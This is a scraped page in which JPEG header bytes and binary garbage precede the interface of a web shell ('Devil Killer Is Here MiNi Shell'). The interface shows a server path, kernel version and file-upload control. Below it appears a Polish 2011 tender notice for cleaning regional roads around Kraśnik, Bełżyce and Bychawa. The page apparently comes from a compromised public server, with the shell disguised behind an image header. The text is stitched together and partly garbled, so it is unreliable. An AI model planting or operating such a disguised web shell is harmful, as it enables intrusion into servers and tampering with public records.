JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110128/32963-N-2011.html

<p class="kh_header"><b>Bychawa: Wykonanie prac porządkowych przy bieżącym utrzymaniu dróg wojewódzkich w 2011 roku: Zad Nr I - Oczyszczanie nawierzchni drogi wojewódzkiej w m. Kraśnik
Zad Nr II -	Oczyszczanie nawierzchni dróg wojewódzkich  w m. Bełżyce
Zad Nr III -	Oczyszczanie nawierzchni dróg woj. w m. Bychawa
Zad Nr IV -	Sprzątanie obustronne pasa drogowego oraz koszenie trawników w m. Kraśnik
Zad Nr V - Sprzątanie chodników w pasie drogowym w m. Bełżyce
Zad Nr VI - Wywóz nieczystości z 4 szt. koszy na śmieci łącznie z uprzątnięciem terenu parkingu leśnego przy drodze woj. Nr 835 Lublin - Biłgoraj w m. Huta Turobińska</b><br>
<b>Numer ogłoszenia: 32963 - 2011; data zamieszczenia: 28.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Lublinie z/s w Bychawie , ul. Antoniego Budnego 5, 23-100 Bychawa, woj. lubelskie, tel. 081 5661393 w. 28, faks 081 5660256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac porządkowych przy bieżącym utrzymaniu dróg wojewódzkich w 2011 roku: Zad Nr I - Oczyszczanie nawierzchni drogi wojewódzkiej w m. Kraśnik
Zad Nr II -	Oczyszczanie nawierzchni dróg wojewódzkich  w m. Bełżyce
Zad Nr III -	Oczyszczanie nawierzchni dróg woj. w m. Bychawa
Zad Nr IV -	Sprzątanie obustronne pasa drogowego oraz koszenie trawników w m. Kraśnik
Zad Nr V - Sprzątanie chodników w pasie drogowym w m. Bełżyce
Zad Nr VI - Wywóz nieczystości z 4 szt. koszy na śmieci łącznie z uprzątnięciem terenu parkingu leśnego przy drodze woj. Nr 835 Lublin - Biłgoraj w m. Huta Turobińska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje:
Wykonanie prac porządkowych przy bieżącym utrzymaniu dróg wojewódzkich w 2011 roku:
Zadanie Nr I - Oczyszczanie nawierzchni drogi wojewódzkiej  w m. Kraśnik
Zadanie Nr II - Oczyszczanie nawierzchni dróg wojewódzkich  w m. Bełżyce
Zadanie Nr III - Oczyszczanie nawierzchni dróg wojewódzkich  w m. Bychawa
Zadanie Nr IV - Sprzątanie obustronne pasa drogowego oraz koszenie trawników w m. Kraśnik
Zadanie Nr V - Sprzątanie chodników w pasie drogowym w m. Bełżyce
Zadanie Nr VI - Wywóz nieczystości z 4 szt. koszy na śmieci łącznie z uprzątnięciem terenu parkingu leśnego przy drodze wojewódzkiej Nr 835 Lublin - Biłgoraj w m. Huta Turobińska.
Wielkość lub zakres zamówienia: 146 224,16 zł netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5, 77.31.20.00-0, 77.31.41.00-5, 90.41.00.00-4, 90.91.40.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Ofertę przetargową (z ceną netto i z podatkiem VAT) wraz z załączonym kosztorysem ofertowym, dla każdego zadania oddzielnie,
2. Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcy - jeżeli Zamawiający zamierza powierzyć usługi podwykonawcom.
3. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo Zamówień Publicznych,
4. W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu 
o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pok. nr 1 (cena 7 zł) lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres e-mail: rdw.lublin@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2011 godzina 11:45, miejsce: w siedzibie zamawiającego w pok. nr 5, otwarcie ofert - godz.12:00 w pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie - pocztą, za pomocą faksu nr (81) 566 02 56 lub drogą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl.
Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron 
na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z wykonawcami: 
1. W sprawach technicznych - P. Edward Rudzik, tel. (81) 566-13-93 w. 23.
2. W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - P. Anna Kaczor, P. Ireneusz Król, tel. (81) 566-13-92, 566-13-93 w. 28.
Uwaga: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają się ubiegać o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem na numer (81) 566-02-56  lub pocztą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl, zawierającej podstawowe dane firmy (nazwa, adres, numer telefonu i faksu). Wykonawcy którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, odwołaniach dotyczących treści ogłoszenia i SIWZ, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr I - Oczyszczanie nawierzchni drogi wojewódzkiej  w m. Kraśnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oczyszczanie nawierzchni drogi wojewódzkiej Nr 833 Chodel - Kraśnik w m. Kraśnik ul. Urzędowska, km 18+900 - 25+096 oraz ul. Lubelska, km 25+096 - 26+679 z nieczystości  po sezonie zimowym i w okresie letnim.
1. Nawierzchnie drogi wojewódzkiej należy sprzątać w zakresie zgodnym z przedmiarem  prac oraz Warunkami oczyszczania nawierzchni.
2. Sprzątanie po okresie zimowym winno być wykonane jednokrotnie po uprzednim powiadomieniu przez Zamawiającego.
3. W okresie letnim nawierzchnię należy oczyszczać  15 razy.
4. Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności sprzątań w okresie letnim oraz ilości m2.
Warunki wykonania oczyszczenia nawierzchni drogi wojewódzkiej w m.Kraśnik   
1. Jezdnię należy sprzątać na szerokości 0,75 mb od krawędzi (krawężnika) po obu stronach drogi.
2. Wykonawca na własny koszt i we własnym zakresie zagospodaruje nieczystości. 
3. Do oczyszczania mechanicznego należy stosować (szczotki mechaniczne) urządzenia dwuszczotkowe, w skład których wchodzi szczotka wykonana z twardych elementów czyszczących, służąca do zdrapywania i usuwania zanieczyszczeń, oraz szczotka miękka służąca do zamiatania  i usuwania  niezwiązanych nieczystości.
4. Ze względu na duże pylenie powstające w procesie czyszczenia, szczotki powinny być wyposażone w urządzenie pochłaniające pyły oraz umożliwiające czyszczenie powierzchni na sucho i na mokro.
5. W szczególnych przypadkach (bardzo duże zanieczyszczenie) oczyszczenie nawierzchni można wykonać przez spłukanie wodą.
6. Wykonawca o każdorazowej potrzebie oczyszczania będzie powiadamiany przez Zamawiającego  (zarówno po sezonie zimowym jak i w okresie letnim).
7. Od momentu otrzymania informacji o konieczności oczyszczenia Wykonawca winien wykonać je w ciągu 24 godzin.
8. Odbiór zostanie dokonany po każdorazowym wykonaniu oczyszczenia w okresie 7 dni po pisemnym zgłoszeniu.
9. Wykonawca będzie prowadził oczyszczanie z zachowaniem wszelkich warunków bezpieczeństwa.
10. Oznakowanie prac prowadzonych w pasie drogowym należy do Wykonawcy i winno być zgodne z Załącznikami Nr 1-4 do rozporządzenia Ministra Infrastruktury z dn. 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania na drogach.
11. Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt bezwzględnie winien być wyposażony w lampę błyskową koloru żółtego.
Wielkość lub zakres zamówienia: 49 828,08 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr II - Oczyszczanie nawierzchni dróg wojewódzkich  w m. Bełżyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oczyszczanie nawierzchni dróg wojewódzkich Nr 747 Chodel - Konopnica i Nr 834 Bełżyce - Stara Wieś w m. Bełżyce, z nieczystości  po sezonie zimowym i w okresie letnim.
1. Nawierzchnie dróg wojewódzkich należy sprzątać w zakresie zgodnym z przedmiarem prac oraz Warunkami oczyszczania nawierzchni.
2. Sprzątanie po okresie zimowym winno być wykonane jednokrotnie po uprzednim powiadomieniu przez Zamawiającego.
3. W okresie letnim nawierzchnię należy oczyszczać  15 razy.
4. Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności sprzątań w okresie letnim oraz ilości m2.
Warunki wykonania oczyszczenia nawierzchni dróg wojewódzkich w m. Bełżyce
1. Jezdnię należy sprzątać na szerokości 0,75 mb od krawędzi (krawężnika) po obu stronach drogi.
2. Wykonawca na własny koszt i we własnym zakresie zagospodaruje nieczystości.  
3. Do oczyszczania mechanicznego należy stosować (szczotki mechaniczne) urządzenia dwuszczotkowe, w skład których wchodzi szczotka wykonana z twardych elementów czyszczących, służąca do zdrapywania i usuwania zanieczyszczeń, oraz szczotka miękka służąca do zamiatania  i usuwania  niezwiązanych nieczystości.
4. Ze względu na duże pylenie powstające w procesie czyszczenia, szczotki powinny być wyposażone w urządzenie pochłaniające pyły oraz umożliwiające czyszczenie powierzchni na sucho i na mokro.
5. W szczególnych przypadkach (bardzo duże zanieczyszczenie) oczyszczenie nawierzchni można wykonać przez spłukanie wodą.
6. Wykonawca o każdorazowej potrzebie oczyszczania będzie powiadamiany przez Zamawiającego  (zarówno po sezonie zimowym jak i w okresie letnim).
7. Od momentu otrzymania informacji o konieczności oczyszczenia Wykonawca winien wykonać je w ciągu 24 godzin.
8. Odbiór zostanie dokonany po każdorazowym wykonaniu oczyszczenia w okresie 7 dni po pisemnym zgłoszeniu.
9. Wykonawca będzie prowadził oczyszczanie z zachowaniem wszelkich warunków bezpieczeństwa.
10. Oznakowanie prac prowadzonych w pasie drogowym należy do Wykonawcy i winno być zgodne z Załącznikami Nr 1-4 do rozporządzenia Ministra Infrastruktury z dn. 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania na drogach.
11. Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt bezwzględnie winien być wyposażony w lampę błyskową koloru żółtego.
Wielkość lub zakres zamówienia: 19 849,08 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr III - Oczyszczanie nawierzchni dróg wojewódzkich  w m. Bychawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oczyszczanie nawierzchni dróg wojewódzkich Nr 834 Bełżyce - Stara Wieś oraz Nr 836 Bychawa kol. Kębłów w m. Bychawa z nieczystości  po sezonie zimowym i w okresie letnim.
1. Nawierzchnie drogi wojewódzkiej należy sprzątać w zakresie zgodnym z przedmiarem prac oraz Warunkami oczyszczania nawierzchni.
2. Sprzątanie po okresie zimowym winno być wykonane jednokrotnie po uprzednim powiadomieniu przez Zamawiającego.
3. W okresie letnim nawierzchnię należy oczyszczać 15 razy.
4. Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności sprzątań w okresie letnim oraz ilości m2
Warunki wykonania oczyszczenia nawierzchni drogi wojewódzkiej w m. Bychawa
1. Jezdnię należy sprzątać na szerokości 0,75 mb od krawędzi (krawężnika) po obu stronach drogi.
2. Wykonawca na własny koszt i we własnym zakresie zagospodaruje nieczystości.  
3. Zamawiający dopuszcza sprzątanie ręczne.
4. W przypadku oczyszczania mechanicznego należy stosować (szczotki mechaniczne) urządzenia dwuszczotkowe, w skład których wchodzi szczotka wykonana z twardych elementów czyszczących, służąca do zdrapywania i usuwania zanieczyszczeń, oraz szczotka miękka służąca do zamiatania i usuwania  niezwiązanych nieczystości.
5. Ze względu na duże pylenie powstające w procesie czyszczenia, szczotki powinny być wyposażone w urządzenie pochłaniające pyły oraz umożliwiające czyszczenie powierzchni na sucho i na mokro.
6. W szczególnych przypadkach (bardzo duże zanieczyszczenie) oczyszczenie nawierzchni można wykonać przez spłukanie wodą.
7. Wykonawca o każdorazowej potrzebie oczyszczania będzie powiadamiany przez Zamawiającego  (zarówno po sezonie zimowym jak i w okresie letnim).
8. Od momentu otrzymania informacji o konieczności oczyszczenia Wykonawca winien wykonać je w ciągu 24 godzin.
9. Odbiór zostanie dokonany po każdorazowym wykonaniu oczyszczenia w okresie 7 dni po pisemnym zgłoszeniu.
10. Wykonawca będzie prowadził oczyszczanie z zachowaniem wszelkich warunków bezpieczeństwa.
11. Oznakowanie prac prowadzonych w pasie drogowym należy do Wykonawcy i winno być zgodne z Załącznikami Nr 1-4 do rozporządzenia Ministra Infrastruktury z dn. 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania na drogach.
12. Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt bezwzględnie winien być wyposażony w lampę błyskową koloru żółtego.
Wielkość lub zakres zamówienia: 19 542,60 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr IV - Sprzątanie obustronne pasa drogowego oraz koszenie trawników w m. Kraśnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Sprzątanie pasa drogowego  z nieczystości stałych w ciągu drogi wojewódzkiej Nr 833 Chodel - Kraśnik w m. Kraśnik ul. Urzędowska i ul. Lubelska, km 19+000 - 26+679.
1. Sprzątanie przewiduje 88 sprzątań wykonanych w poniedziałek i piątek każdego tygodnia przez  10 m-cy, począwszy od miesiąca marca 2011 roku.  
2. Do sprzątania przewidziano  1 243 m2 co stanowi 1% powierzchni  PD. w m. Kraśnik.
3. Sprzątanie winno być wykonane zgodnie z Warunkami wykonania sprzątania pasa drogowego.
4.Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności sprzątań w okresie letnim.   
Warunki wykonania  sprzątania pasa drogowego drogi  wojewódzkiej Nr 833 Chodel - Kraśnik  m. Kraśnik, ul. Urzędowska i ul. Lubelska
1. Sprzątanie obejmuje cały pas drogowy łącznie z chodnikiem, pasem zieleni i znajdującymi się w pasie żywopłotami oraz skarpami, zgodnie z  podaną lokalizacją.
2. Sprzątanie polega na wyzbieraniu wszelkich nieczystości  znajdujących się w pasie drogowym.
3. Sprzątanie winno się odbywać w poniedziałek i piątek każdego tygodnia począwszy od 1 marca do 31 grudnia 2011 r.:
- ul. Urzędowska i ul. Lubelska, km 19+000 - 26+679 - 7 679 mb - poniedziałek
7 679 mb x 6,0 mb x 2 str. = 92 148 m2 (powierzchnia pasa drogowego), do sprzątania przyjęto 1% powierzchni PD tj. - 921,50 m2, krotność sprzątania - 44,
- ul. Urzędowska i ul. Lubelska, km 24+000 - 26+679 - 2 679 mb - piątek 
2 679 mb x 6,0 mb x 2 str. = 32 148 m2 (powierzchnia pasa drogowego), do sprzątania przyjęto 1% powierzchni PD tj. - 321,50 m2, krotność sprzątania - 44.
4. W przypadku gdy w dany poniedziałek lub piątek wypada święto, sprzątanie należy wykonać w następny dzień roboczy.
5. Zebrane nieczystości Wykonawca utylizuje we własnym zakresie i na własny koszt.
6. Pracownicy dokonujący sprzątania  powinni być ubrani w kamizelki ostrzegawcze.
